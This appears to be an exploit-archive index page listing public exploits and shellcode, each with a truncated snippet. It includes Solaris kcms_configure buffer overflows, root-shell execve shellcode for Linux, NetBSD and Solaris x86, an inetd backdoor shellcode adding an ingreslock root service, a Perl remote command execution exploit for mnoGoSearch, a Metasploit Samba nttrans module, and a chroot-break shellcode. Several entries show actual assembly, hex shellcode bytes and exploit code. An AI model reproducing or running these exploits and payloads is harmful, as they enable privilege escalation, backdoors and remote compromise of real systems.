Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly...

solaris/x86 setuid(0) execve(//bin/sh)

No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...

linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 getppid + execve/proc/pid/exe 51 bytes ==================================================== / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char...

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes

Exploit for netbsd/x86 platform in category shellcode ================================================================== netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes ================================================================== / minervini at neuralnoise dot com c 2005...

solaris/x86 add services and execve inetd 201 bytes

Exploit for solaris/x86 platform in category shellcode =================================================== solaris/x86 add services and execve inetd 201 bytes =================================================== / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root...

linux/x86 execve /bin/sh 38 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 38 bytes ================================= / email protected execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" //...

linux/x86 execve /bin/sh 38 bytes

No description provided by source. / [email protected] execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include stdio.h char shellcode= "\xeb\x18" // jmp 0x18 // 3-4 "\x5e" // popl %esi // 5 "\x89\x76\x08" // movl %esi, 0x8%esi // 6-8 "\x31\xc0" // xor...

mnoGoSearch 3.1.20 - Remote Command Execution

mnoGoSearch 3.1.20 - Remote Command Execution !/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote command execution as the webserver user id for linux ix86 by pokleyzz use IO::Socket; $host = "127.0.0.1"; $cmd = "ls -la"; $searchpath = "/cgi-bin/search.cgi"; $rawret...

Samba 2.2.x nttrans Overflow

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

Solaris 78 - kcms_configure Command-Line Buffer Overflow (2)

Solaris 78 - kcmsconfigure Command-Line Buffer Overflow 2 // source: https://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow...

linux/x86 break chroot setuid(0) + /bin/sh 132 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 break chroot setuid0 + /bin/sh 132 bytes ==================================================== / Linux/x86 - setreuid0, 0; - chroot-break make a temp dir with mkdir, chroot to tempdi...